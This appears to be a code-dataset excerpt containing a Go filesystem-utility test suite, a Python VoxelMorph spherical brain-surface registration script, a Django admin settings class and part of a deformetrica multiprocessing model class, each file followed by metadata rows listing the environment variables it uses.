result, err := CopyFile(readme, subdir)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed to create file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
// Fix permissions on subdir and remove it
assert.Nil(t, os.Chmod(subdir, 0755))
assert.Nil(t, RemoveAll(subdir))
}
// happy
{
// Copy regular file
foo := path.Join(tmpDir, "foo")
assert.False(t, Exists(foo))
result, err := CopyFile(readme, foo)
assert.Nil(t, err)
assert.Equal(t, SlicePath(foo, -2, -1), SlicePath(result, -2, -1))
assert.True(t, Exists(foo))
srcMD5, err := MD5(readme)
assert.Nil(t, err)
dstMD5, err := MD5(foo)
assert.Nil(t, err)
assert.Equal(t, srcMD5, dstMD5)
// Overwrite file
result, err = CopyFile(testfile, foo)
assert.Nil(t, err)
assert.Equal(t, SlicePath(foo, -2, -1), SlicePath(result, -2, -1))
srcMD5, err = MD5(testfile)
assert.Nil(t, err)
dstMD5, err = MD5(foo)
assert.Nil(t, err)
assert.Equal(t, srcMD5, dstMD5)
}
}
func TestExists(t *testing.T) {
resetTest()
// now try a permissions denied check
{
sub, err := MkdirP(path.Join(tmpDir, "dir/sub"))
assert.Nil(t, err)
assert.True(t, Exists(sub))
file, err := Touch(path.Join(sub, "file"))
assert.Nil(t, err)
assert.Nil(t, Chmod(path.Dir(sub), 0444, RecurseOpt(true)))
assert.True(t, Exists(sub))
assert.True(t, Exists(file))
}
// basic check
{
assert.False(t, Exists("bob"))
assert.True(t, Exists(readme))
}
}
func TestMkdirP(t *testing.T) {
// happy
{
result, err := MkdirP(tmpDir)
assert.Nil(t, err)
assert.Equal(t, SlicePath(tmpDir, -2, -1), SlicePath(result, -2, -1))
assert.True(t, Exists(tmpDir))
assert.Nil(t, RemoveAll(result))
}
// permissions given
{
result, err := MkdirP(tmpDir, 0555)
assert.Nil(t, err)
assert.Equal(t, SlicePath(tmpDir, -2, -1), SlicePath(result, -2, -1))
assert.True(t, Exists(tmpDir))
mode := Mode(tmpDir)
assert.Equal(t, os.ModeDir|os.FileMode(0555), mode)
}
// Remove read permissions from file
{
assert.Nil(t, os.Chmod(tmpDir, 0222))
result, err := MkdirP(path.Join(tmpDir, "foo"))
assert.Equal(t, "temp/foo", SlicePath(result, -2, -1))
assert.True(t, strings.HasPrefix(err.Error(), "failed creating directories for"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(tmpDir, 0755))
}
// HOME not set
{
// unset HOME
home := os.Getenv("HOME")
os.Unsetenv("HOME")
assert.Equal(t, "", os.Getenv("HOME"))
defer os.Setenv("HOME", home)
result, err := MkdirP("~/")
assert.Equal(t, "failed to expand the given path ~/: failed to compute the user's home directory: $HOME is not defined", err.Error())
assert.Equal(t, "", result)
}
}
func TestMD5(t *testing.T) {
resetTest()
// force copy error
{
test.OneShotForceIOCopyError()
assert.Nil(t, WriteString(tmpfile, "test"))
result, err := MD5(tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed copying file data into hash from"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
}
// empty string
{
result, err := MD5("")
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// doesn't exist
{
result, err := MD5("foo")
assert.Equal(t, "", result)
assert.Equal(t, "file does not exist", err.Error())
}
// happy
{
f, _ := os.Create(tmpfile)
defer f.Close()
f.WriteString(`This is a test of the emergency broadcast system.`)
expected := "067a8c38325b12159844261d16e5cb13"
result, err := MD5(tmpfile)
assert.Nil(t, err)
assert.Equal(t, expected, result)
}
// Remove read permissions from file
{
assert.Nil(t, os.Chmod(tmpfile, 0222))
result, err := MD5(tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed opening target file"))
assert.Nil(t, os.Chmod(tmpfile, 0644))
}
}
func TestMove(t *testing.T) {
resetTest()
// Copy file in to tmpDir then rename in same location
assert.Nil(t, Copy(testfile, tmpDir))
newTestFile := path.Join(tmpDir, "testfile")
srcMd5, _ := MD5(newTestFile)
assert.True(t, Exists(newTestFile))
assert.False(t, Exists(tmpfile))
result, err := Move(newTestFile, tmpfile)
assert.Nil(t, err)
assert.Equal(t, tmpfile, result)
assert.True(t, Exists(tmpfile))
dstMd5, err := MD5(tmpfile)
assert.Nil(t, err)
assert.False(t, Exists(newTestFile))
assert.Equal(t, srcMd5, dstMd5)
// Now create a sub directory and move it there
subDir := path.Join(tmpDir, "sub")
MkdirP(subDir)
newfile, err := Move(tmpfile, subDir)
assert.Nil(t, err)
assert.Equal(t, path.Join(subDir, path.Base(tmpfile)), newfile)
assert.False(t, Exists(tmpfile))
assert.True(t, Exists(newfile))
dstMd5, _ = MD5(newfile)
assert.Equal(t, srcMd5, dstMd5)
// permission denied
assert.Nil(t, os.Chmod(subDir, 0222))
result, err = Move(newfile, tmpfile)
assert.Equal(t, "", result)
assert.True(t, strings.HasPrefix(err.Error(), "failed renaming file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(subDir, 0755))
}
func TestPwd(t *testing.T) {
assert.Equal(t, "sys", path.Base(Pwd()))
}
func TestReadBytes(t *testing.T) {
resetTest()
// empty string
{
data, err := ReadBytes("")
assert.Equal(t, ([]byte)(nil), data)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// invalid file
{
data, err := ReadBytes("foo")
assert.Equal(t, ([]byte)(nil), data)
assert.True(t, strings.HasPrefix(err.Error(), "failed reading the file"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// happy
{
// Write out test data
assert.Nil(t, WriteString(tmpfile, "this is a test"))
// Read the file back in and validate
data, err := ReadBytes(tmpfile)
assert.Nil(t, err)
assert.Equal(t, "this is a test", string(data))
}
}
func TestReadLines(t *testing.T) {
resetTest()
// empty string
{
data, err := ReadLines("")
assert.Equal(t, ([]string)(nil), data)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// invalid file
{
data, err := ReadLines("foo")
assert.Equal(t, ([]string)(nil), data)
assert.True(t, strings.HasPrefix(err.Error(), "failed reading the file"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// happy
{
lines, err := ReadLines(testfile)
assert.Nil(t, err)
assert.Equal(t, 18, len(lines))
}
}
func TestReadLinesP(t *testing.T) {
resetTest()
// empty string
{
data := ReadLinesP(strings.NewReader(""))
assert.Equal(t, ([]string)(nil), data)
}
// happy
{
data, err := ReadString(testfile)
assert.Nil(t, err)
lines := ReadLinesP(strings.NewReader(data))
assert.Equal(t, 18, len(lines))
}
}
func TestReadString(t *testing.T) {
resetTest()
// empty string
{
data, err := ReadString("")
assert.Equal(t, "", data)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// invalid file
{
data, err := ReadString("foo")
assert.Equal(t, "", data)
assert.True(t, strings.HasPrefix(err.Error(), "failed reading the file"))
assert.True(t, strings.Contains(err.Error(), "no such file or directory"))
}
// happy
{
// Write out test data
assert.Nil(t, WriteString(tmpfile, "this is a test"))
// Read the file back in and validate
data, err := ReadString(tmpfile)
assert.Nil(t, err)
assert.Equal(t, "this is a test", data)
}
}
func TestRemove(t *testing.T) {
resetTest()
// Write out test data
assert.Nil(t, WriteString(tmpfile, "this is a test"))
assert.True(t, Exists(tmpfile))
// Now remove the file and validate
assert.Nil(t, Remove(tmpfile))
assert.False(t, Exists(tmpfile))
}
func TestSymlink(t *testing.T) {
resetTest()
_, err := Touch(tmpfile)
assert.Nil(t, err)
// Create file symlink
newfilelink := path.Join(tmpDir, "filelink")
assert.Nil(t, Symlink(tmpfile, newfilelink))
assert.True(t, IsSymlink(newfilelink))
assert.True(t, IsSymlinkFile(newfilelink))
assert.False(t, IsSymlinkDir(newfilelink))
// Create dir symlink
subdir := path.Join(tmpDir, "sub")
_, err = MkdirP(subdir)
assert.Nil(t, err)
newdirlink := path.Join(tmpDir, "sublink")
assert.Nil(t, Symlink(subdir, newdirlink))
assert.True(t, IsSymlink(newdirlink))
assert.False(t, IsSymlinkFile(newdirlink))
assert.True(t, IsSymlinkDir(newdirlink))
}
func TestTouch(t *testing.T) {
resetTest()
// Force failure of Close via monkey patch
{
test.OneShotForceOSCloseError()
_, err := Touch(tmpfile)
assert.Equal(t, fmt.Sprintf("failed closing file %s: invalid argument", tmpfile), err.Error())
// Clean up
err = Remove(tmpfile)
assert.Nil(t, err)
}
// empty string
{
result, err := Touch("")
assert.Equal(t, "", result)
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// permission denied
{
// Create the tmpfile
result, err := Touch(tmpfile)
assert.Equal(t, SlicePath(tmpfile, -2, -1), SlicePath(result, -2, -1))
// Now try to truncate it after setting to readonly
assert.Nil(t, os.Chmod(tmpfile, 0444))
result, err = Touch(tmpfile)
assert.Equal(t, SlicePath(tmpfile, -2, -1), SlicePath(result, -2, -1))
assert.True(t, strings.HasPrefix(err.Error(), "failed creating/truncating file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(tmpfile, 0755))
assert.Nil(t, Remove(tmpfile))
}
// happy
{
// Doesn't exist so create
assert.False(t, Exists(tmpfile))
_, err := Touch(tmpfile)
assert.Nil(t, err)
assert.True(t, Exists(tmpfile))
// Truncate and re-create it
_, err = Touch(tmpfile)
assert.Nil(t, err)
}
}
func TestWriteBytes(t *testing.T) {
resetTest()
// attemp to write to a readonly dst
{
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
err = WriteBytes(path.Join(dstDir, "file"), []byte("test"))
assert.True(t, strings.HasPrefix(err.Error(), "failed writing bytes to file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(dstDir, 0444))
assert.Nil(t, Remove(dstDir))
}
// empty target
{
err := WriteBytes("", []byte("test"))
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// happy
{
// Read and write file
data, err := ioutil.ReadFile(testfile)
assert.Nil(t, err)
err = WriteBytes(tmpfile, data, 0644)
assert.Nil(t, err)
// Test the resulting file
data2, err := ioutil.ReadFile(tmpfile)
assert.Nil(t, err)
assert.Equal(t, data, data2)
}
}
func TestWriteLines(t *testing.T) {
resetTest()
// attemp to write to a readonly dst
{
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
err = WriteLines(path.Join(dstDir, "file"), []string{"test"})
assert.True(t, strings.HasPrefix(err.Error(), "failed writing lines to file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(dstDir, 0444))
assert.Nil(t, Remove(dstDir))
}
// empty target
{
err := WriteLines("", []string{"test"})
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// happy
{
lines, err := ReadLines(testfile)
assert.Nil(t, err)
assert.Equal(t, 18, len(lines))
err = WriteLines(tmpfile, lines, 0644)
assert.Nil(t, err)
{
lines2, err := ReadLines(tmpfile)
assert.Nil(t, err)
assert.Equal(t, lines, lines2)
}
}
}
func TestWriteStream(t *testing.T) {
// force close only
{
test.OneShotForceOSCloseError()
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile)
assert.Nil(t, reader.Close())
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, os.Remove(tmpfile))
}
// force sync and close errors
{
test.OneShotForceOSSyncError()
test.OneShotForceOSCloseError()
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile)
assert.Nil(t, reader.Close())
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.Contains(err.Error(), ": failed syncing stream to file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, os.Remove(tmpfile))
}
// force sync and close errors
{
test.OneShotForceOSSyncError()
test.OneShotForceOSCloseError()
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile)
assert.Nil(t, reader.Close())
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.Contains(err.Error(), ": failed syncing stream to file"))
assert.True(t, strings.HasSuffix(err.Error(), ": invalid argument"))
assert.Nil(t, os.Remove(tmpfile))
}
// attemp to read from iotest TimeoutReader and force failure close
{
test.OneShotForceOSCloseError()
reader, err := os.Open(testfile)
assert.Nil(t, err)
testReader := iotest.TimeoutReader(reader)
err = WriteStream(testReader, tmpfile)
assert.Nil(t, reader.Close())
assert.True(t, strings.HasPrefix(err.Error(), "failed to close file"))
assert.True(t, strings.HasSuffix(err.Error(), ": failed copying stream data: timeout"))
assert.Nil(t, os.Remove(tmpfile))
}
// attemp to write to a readonly dst
{
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
err = WriteStream(&os.File{}, path.Join(dstDir, "file"))
assert.True(t, strings.HasPrefix(err.Error(), "failed opening file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(dstDir, 0444))
assert.Nil(t, Remove(dstDir))
}
// empty destination file
{
err := WriteStream(&os.File{}, "")
assert.Equal(t, "empty string is an invalid path", err.Error())
}
var expectedData []byte
expectedData, err := ioutil.ReadFile(testfile)
assert.Nil(t, err)
// No file exists
{
resetTest()
// Read and write file
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile, 0644)
assert.Nil(t, reader.Close())
assert.Nil(t, err)
// Test the resulting file
var data []byte
data, err = ioutil.ReadFile(tmpfile)
assert.Nil(t, err)
assert.Equal(t, expectedData, data)
assert.Nil(t, os.Remove(tmpfile))
}
// Overwrite and truncate file
{
// Read and write file
reader, err := os.Open(testfile)
assert.Nil(t, err)
err = WriteStream(reader, tmpfile)
assert.Nil(t, reader.Close())
assert.Nil(t, err)
// Test the resulting file
var data []byte
data, err = ioutil.ReadFile(testfile)
assert.Nil(t, err)
assert.Equal(t, expectedData, data)
assert.Nil(t, os.Remove(tmpfile))
}
}
func TestWriteString(t *testing.T) {
resetTest()
// attemp to write to a readonly dst
{
dstDir, err := MkdirP(path.Join(tmpDir, "dst"))
assert.Nil(t, err)
assert.Nil(t, os.Chmod(dstDir, 0444))
err = WriteString(path.Join(dstDir, "file"), "test")
assert.True(t, strings.HasPrefix(err.Error(), "failed writing string to file"))
assert.True(t, strings.Contains(err.Error(), "permission denied"))
assert.Nil(t, os.Chmod(dstDir, 0444))
assert.Nil(t, Remove(dstDir))
}
// empty target
{
err := WriteString("", "test")
assert.Equal(t, "empty string is an invalid path", err.Error())
}
// happy
{
// Read and write file
data, err := ioutil.ReadFile(testfile)
assert.Nil(t, err)
err = WriteString(tmpfile, string(data), 0644)
assert.Nil(t, err)
// Test the resulting file
data2, err := ioutil.ReadFile(tmpfile)
assert.Nil(t, err)
assert.Equal(t, data, data2)
}
}
| [
"\"HOME\"",
"\"HOME\""
]
| []
| [
"HOME"
]
| [] | ["HOME"] | go | 1 | 0 | |
scripts/sphere/register.py | #!/usr/bin/env python
"""
Example script to register two volumes with VoxelMorph models.
Please make sure to use trained models appropriately. Let's say we have a model trained to register
a scan (moving) to an atlas (fixed). To register a scan to the atlas and save the warp field, run:
register.py --moving moving.nii.gz --fixed fixed.nii.gz --model model.pt
--moved moved.nii.gz --warp warp.nii.gz
The source and target input images are expected to be affinely registered.
If you use this code, please cite the following, and read function docs for further info/citations
VoxelMorph: A Learning Framework for Deformable Medical Image Registration
G. Balakrishnan, A. Zhao, M. R. Sabuncu, J. Guttag, A.V. Dalca.
IEEE TMI: Transactions on Medical Imaging. 38(8). pp 1788-1800. 2019.
or
Unsupervised Learning for Probabilistic Diffeomorphic Registration for Images and Surfaces
A.V. Dalca, G. Balakrishnan, J. Guttag, M.R. Sabuncu.
MedIA: Medical Image Analysis. (57). pp 226-236, 2019
Copyright 2020 Adrian V. Dalca
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in
compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the License is
distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied. See the License for the specific language governing permissions and limitations under
the License.
"""
import os
import argparse
import matplotlib.pyplot as plt
# third party
import numpy as np
import nibabel as nib
import torch
from scipy.interpolate import RegularGridInterpolator
from astropy.coordinates import cartesian_to_spherical, spherical_to_cartesian
# import voxelmorph with sphere backend
os.environ['VXM_BACKEND'] = 'sphere'
import voxelmorph as vxm # nopep8
import math
# parse commandline args
parser = argparse.ArgumentParser()
parser.add_argument('--moving', required=True, help='moving image (source) filename')
parser.add_argument('--fixed', required=True, help='fixed image (target) filename')
parser.add_argument('--moved', help='warped image output filename')
parser.add_argument('--model', required=True, help='pytorch model for nonlinear registration')
# parser.add_argument('--normalize_type', default='std', help='select the data normalization processing type')
parser.add_argument('--warp', help='output warp deformation filename')
parser.add_argument('--sphere_sub', help='sphere_sub image filename')
parser.add_argument('--sphere_atlas', help='sphere_atlas image filename')
parser.add_argument('--sphere_reg', help='sphere.reg image output filename')
parser.add_argument('--sulc_sub', help='silc_sub image filename')
parser.add_argument('--sulc_atlas', help='silc_atlas image filename')
parser.add_argument('--sphere_freesurfer', help='sphere_freesurfer image filename')
parser.add_argument('--plot_image', help='show time image output filename')
parser.add_argument('--plot_image_dif_1', help='show dif image output filename')
parser.add_argument('--plot_image_dif_2', help='show dif image output filename')
parser.add_argument('-g', '--gpu', help='GPU number(s) - if not supplied, CPU is used')
parser.add_argument('--multichannel', action='store_true',
help='specify that data has multiple channels')
args = parser.parse_args()
def meannormalize(sub_data):
mean = np.mean(sub_data)
std = np.std(sub_data)
norm = (sub_data - mean) / std
return norm, mean, std
def backmeannormalize(input, mean, std):
output = input * std + mean
return output
def minmaxnormalize(sub_data):
zeros = sub_data == 0
max = np.max(sub_data)
min = np.min(sub_data)
norm = (sub_data - min) / (max - min)
norm[zeros] = 0
return norm
def backminmaxnormalize(input, max, min):
output = input * (max - min) + min
return output
def domainnorm(sub_data):
domain = 33
norm = sub_data / domain
return norm
def backdomainnorm(sub_data):
domain = 33
output = sub_data * domain
return output
# def normalize_forword(data, type="std"):
# if type == "std":
# return meannormalize(data)
# elif type == "min_max":
# return minmaxnormalize(data)
# else:
# raise KeyError("type is error")
#
# def normalize_backword(data, a, b, type="std"):
# if type == "std":
# return backmeannormalize(data, a, b)
# elif type == "min_max":
# return backminmaxnormalize(data, a, b)
# else:
# raise KeyError("type is error")
def interpolate(warp_file, lh_sphere):
x = np.linspace(-128, 128, 256) # phi ###
y = np.linspace(0, 512, 512) # theta ###
# print(warp_file.files)
warp = warp_file.squeeze()
warp = warp.permute(0, 2, 1)
warp = warp.detach().numpy()
# warp = warp_file['vol']
# warp = np.moveaxis(warp, 1, -1)
interpolate_function_x = RegularGridInterpolator((x, y), -warp[0]) # x-axis
interpolate_function_y = RegularGridInterpolator((x, y), -warp[1]) # y-axis
coords, faces = nib.freesurfer.read_geometry(lh_sphere)
r, phi, theta = cartesian_to_spherical(coords[:, 0], coords[:, 1], coords[:, 2])
p = phi.degree
t = theta.degree
theta_bins = 512
phi_bins = 256
theta_width = math.degrees(2 * np.pi) / theta_bins
t /= theta_width
phi_width = math.degrees(np.pi) / phi_bins
p /= phi_width
t = t.reshape(-1, 1)
p = p.reshape(-1, 1)
pts = np.concatenate((p, t), axis=1)
new_pts_x = interpolate_function_x(pts)
new_pts_y = interpolate_function_y(pts)
x_prime = pts.T[0] + new_pts_x
y_prime = pts.T[1] + new_pts_y
x_prime *= phi_width
y_prime *= theta_width
y_prime = np.clip(y_prime, 0, 360)
x_prime = np.clip(x_prime, -90, 90)
t_prime = [math.radians(i) for i in y_prime]
p_prime = [math.radians(i) for i in x_prime]
t_prime = np.array(t_prime)
p_prime = np.array(p_prime)
return r, p_prime, t_prime
# save 4 image
def save4image(lh_sphere_sub, lh_sphere_atlas, lh_sulc_sub, lh_sulc_atlas, lh_sphere_freesurfer, phi_prime, theta_prime,
imagesavefilename):
lh_morph_sulc_sub = nib.freesurfer.read_morph_data(lh_sulc_sub)
lh_morph_sulc_atlas = nib.freesurfer.read_morph_data(lh_sulc_atlas)
coords_sub, faces_sub = nib.freesurfer.read_geometry(lh_sphere_sub)
r_sub, phi_sub, theta_sub = cartesian_to_spherical(coords_sub[:, 0], coords_sub[:, 1], coords_sub[:, 2])
coords_atlas, faces_atlas = nib.freesurfer.read_geometry(lh_sphere_atlas)
r_atlas, phi_atlas, theta_atlas = cartesian_to_spherical(coords_atlas[:, 0], coords_atlas[:, 1], coords_atlas[:, 2])
coords_freesurfer, faces_freesurfer = nib.freesurfer.read_geometry(lh_sphere_freesurfer)
r_reg, phi_reg, theta_reg = cartesian_to_spherical(coords_freesurfer[:, 0], coords_freesurfer[:, 1],
coords_freesurfer[:, 2])
fig = plt.figure(figsize=(14, 7))
ax = fig.add_subplot(141)
ax.scatter(phi_sub.degree, theta_sub.degree, s=0.1,
c=lh_morph_sulc_sub) # phi.degree: [-90, 90], theta.degree: [0, 360]
plt.title('Moving')
ax = fig.add_subplot(142)
ax.scatter(phi_atlas.degree, theta_atlas.degree, s=0.1, c=lh_morph_sulc_atlas)
plt.title('Fixed')
ax = fig.add_subplot(143)
phi_prime = [math.degrees(p) for p in phi_prime]
thtea_prime = [math.degrees(t) for t in theta_prime]
ax.scatter(phi_prime, thtea_prime, s=0.1, c=lh_morph_sulc_sub) # (256, 512)
plt.title('Moved')
ax = fig.add_subplot(144)
ax.scatter(phi_reg.degree, theta_reg.degree, s=0.1, c=lh_morph_sulc_sub) # (256, 512)
plt.title('Moved FreeSurfer')
plt.savefig(imagesavefilename)
def xyz2degree(lh_sphere, lh_sulc):
# coords: return (x, y, z) coordinates
# faces: defining mesh triangles
coords, faces = nib.freesurfer.read_geometry(lh_sphere)
# (r: radius, phi: latitude, theta: longitude) in radians
r, phi, theta = cartesian_to_spherical(coords[:, 0], coords[:, 1], coords[:, 2])
lat = phi.degree + 90
lon = theta.degree
# resize to (512, 256)
y_bins = 512
x_bins = 256
y_width = math.degrees(2 * np.pi) / y_bins
ys = lon // y_width
x_width = math.degrees(np.pi) / x_bins
xs = lat // x_width
ys = np.clip(ys, 0, 511)
xs = np.clip(xs, 0, 255)
# load curv and sulc info
lh_morph_sulc = nib.freesurfer.read_morph_data(lh_sulc)
xs = xs.astype(np.int32)
ys = ys.astype(np.int32)
# values store [theta, phi, sulc value, curv value]
values = np.zeros((512, 256))
values[ys, xs] = lh_morph_sulc
# values[1, ys, xs] = lh_morph_curv
return values
def xyz2degree2(phi, theta, lh_sulc):
lat = phi + 90
lon = theta
# resize to (512, 256)
y_bins = 512
x_bins = 256
y_width = math.degrees(2 * np.pi) / y_bins
ys = lon // y_width
x_width = math.degrees(np.pi) / x_bins
xs = lat // x_width
ys = np.clip(ys, 0, 511)
xs = np.clip(xs, 0, 255)
# load curv and sulc info
lh_morph_sulc = nib.freesurfer.read_morph_data(lh_sulc)
xs = xs.astype(np.int32)
ys = ys.astype(np.int32)
# values store [theta, phi, sulc value, curv value]
values = np.zeros((512, 256))
values[ys, xs] = lh_morph_sulc
# values[1, ys, xs] = lh_morph_curv
return values
# device handling
if args.gpu and (args.gpu != '-1'):
device = 'cuda'
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
else:
device = 'cpu'
os.environ['CUDA_VISIBLE_DEVICES'] = '-1'
# load moving and fixed images
add_feat_axis = not args.multichannel
moving = vxm.py.utils.load_volfile(args.moving, add_batch_axis=True, add_feat_axis=add_feat_axis)
fixed, fixed_affine = vxm.py.utils.load_volfile(
args.fixed, add_batch_axis=True, add_feat_axis=add_feat_axis, ret_affine=True)
# load and set up model
model = vxm.networks.VxmDense.load(args.model, device)
model.to(device)
model.eval()
# set up normalize type
# normalize_type = args.normalize_type
# normalize_type = "min_max"
# set up tensors and permute
# moving, a_moving, b_moving = normalize_forword(moving, type=normalize_type)
# fixed, a_fixed, b_fixed = normalize_forword(fixed, type=normalize_type)
# moving = domainnorm(moving)
moving = minmaxnormalize(moving)
fixed = minmaxnormalize(fixed)
input_moving = torch.from_numpy(moving).to(device).float().permute(0, 3, 1, 2)
input_fixed = torch.from_numpy(fixed).to(device).float().permute(0, 3, 1, 2)
# predict
moved, warp = model(input_moving, input_fixed, registration=True)
# moved = normalize_backword(moved, a_moving, b_moving, type=normalize_type)
# moved = backdomainnorm(moved)
if args.sphere_sub:
c, faces = nib.freesurfer.read_geometry(args.sphere_sub)
coords = np.empty(shape=c.shape)
r, phi_prime, theta_prime = interpolate(warp, args.sphere_sub)
coords[:, 0], coords[:, 1], coords[:, 2] = spherical_to_cartesian(r, phi_prime, theta_prime)
nib.freesurfer.io.write_geometry(args.sphere_reg, coords, faces)
if args.plot_image:
lh_sphere_sub = args.sphere_sub
lh_sphere_atlas = args.sphere_atlas
lh_sulc_sub = args.sulc_sub
lh_sulc_atlas = args.sulc_atlas
lh_sphere_freesurfer = args.sphere_freesurfer
imagesavefilename = args.plot_image
save4image(lh_sphere_sub, lh_sphere_atlas, lh_sulc_sub, lh_sulc_atlas, lh_sphere_freesurfer, phi_prime, theta_prime,
imagesavefilename)
if args.plot_image_dif_1 or args.plot_image_dif_2:
imagesavefilenamedif_1 = args.plot_image_dif_1
imagesavefilenamedif_2 = args.plot_image_dif_2
dif_moving = xyz2degree(lh_sphere_sub, lh_sulc_sub)
dif_moved = xyz2degree2(phi_prime, theta_prime, lh_sulc_sub)
dif_freesurfer = xyz2degree(lh_sphere_freesurfer, lh_sulc_sub)
dif_moved_moving = dif_moved - dif_moving
print(np.nanmax(dif_moved_moving), np.nanmin(dif_moved_moving), np.nanmean(dif_moved_moving))
dif_freesurfer_moved = dif_freesurfer - dif_moved
plt.figure(figsize=(14, 7))
plt.imshow(dif_moved_moving)
plt.title('moved_moving')
plt.colorbar()
plt.savefig(imagesavefilenamedif_1)
plt.figure(figsize=(14, 7))
plt.imshow(dif_freesurfer_moved)
plt.title('freesurfer_moved')
plt.colorbar()
plt.savefig(imagesavefilenamedif_2)
# save moved image
if args.moved:
moved = moved.detach().cpu().numpy().squeeze()
vxm.py.utils.save_volfile(moved, args.moved, fixed_affine)
# save warp
if args.warp:
warp = warp.detach().cpu().numpy().squeeze()
vxm.py.utils.save_volfile(warp, args.warp, fixed_affine)
| []
| []
| [
"CUDA_VISIBLE_DEVICES",
"VXM_BACKEND"
]
| [] | ["CUDA_VISIBLE_DEVICES", "VXM_BACKEND"] | python | 2 | 0 | |
stackable/contrib/config/conf_admin.py | '''
Created on Oct 27, 2013
@author: patrick
'''
import os
from stackable.stackable import EnvSettingsBase
from .conf_fullhttps import Config_SiteHttps
class EnvSettings_admin(Config_SiteHttps):
"""
PRODUCTION SITE SETTINGS.
TO PROTECT ALL PATHS WITH HTTPS:
* SESSION_COOKIE_SECURE = True
* CSRF_COOKIE_SECURE = True
* SECURE_REQUIRED_PATHS = ('*',)
TO PROTECT ONLY SPECIFIC PATHS:
* SESSION_COOKIE_SECURE = False
* CSRF_COOKIE_SECURE = False
* SECURE_REQUIRED_PATHS = ('/uri/path', '/uri/path',)
"""
DEBUG = False
ENABLE_ADMIN = True
_apps_additions_ = ('django.contrib.admin',)
EnvSettingsBase.patch_apps(_apps_additions_,
after='django.contrib.sitemaps')
# HTTPS
# see http://security.stackexchange.com/questions/8964/trying-to-make-a-django-based-site-use-https-only-not-sure-if-its-secure
# SESSION_COOKIE_SECURE=True
# CSRF_COOKIE_SECURE=True
SECURE_REQUIRED_PATHS = ('/accounts/', '/profile/', '/admin/', )
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
# make sure we get the secret key from outside so it only lives in memory
# never on disk
SECRET_KEY = os.environ.get('DJANGO_PROB_SEED', "")
# haystack
ES_INDEX_NAME = "haystack"
| []
| []
| [
"DJANGO_PROB_SEED"
]
| [] | ["DJANGO_PROB_SEED"] | python | 1 | 0 | |
deformetrica/core/models/abstract_statistical_model.py | import logging
import os
import time
import torch
from abc import abstractmethod
import torch.multiprocessing as mp
from ...core import default
logger = logging.getLogger(__name__)
# used as a global variable when processes are initially started.
process_initial_data = None
def _initializer(*args):
"""
Process initializer function that is called when mp.Pool is started.
:param args: arguments that are to be copied to the target process. This can be a tuple for convenience.
"""
global process_initial_data
process_id, process_initial_data = args
assert 'OMP_NUM_THREADS' in os.environ
torch.set_num_threads(int(os.environ['OMP_NUM_THREADS']))
# manually set process name
with process_id.get_lock():
mp.current_process().name = 'PoolWorker-' + str(process_id.value)
logger.info('pid=' + str(os.getpid()) + ' : ' + mp.current_process().name)
process_id.value += 1
class AbstractStatisticalModel:
"""
AbstractStatisticalModel object class.
A statistical model is a generative function, which tries to explain an observed stochastic process.
"""
####################################################################################################################
### Constructor:
####################################################################################################################
def __init__(self, name='undefined', number_of_processes=default.number_of_processes, gpu_mode=default.gpu_mode):
self.name = name
self.fixed_effects = {}
self.priors = {}
self.population_random_effects = {}
self.individual_random_effects = {}
self.has_maximization_procedure = None
self.number_of_processes = number_of_processes
self.gpu_mode = gpu_mode
self.pool = None
@abstractmethod
def get_fixed_effects(self):
raise NotImplementedError
@abstractmethod
def setup_multiprocess_pool(self, dataset):
raise NotImplementedError
def _setup_multiprocess_pool(self, initargs=()):
if self.number_of_processes > 1:
logger.info('Starting multiprocess using ' + str(self.number_of_processes) + ' processes')
assert len(mp.active_children()) == 0, 'This should not happen. Has the cleanup() method been called ?'
start = time.perf_counter()
process_id = mp.Value('i', 0, lock=True) # shared between processes
initargs = (process_id, initargs)
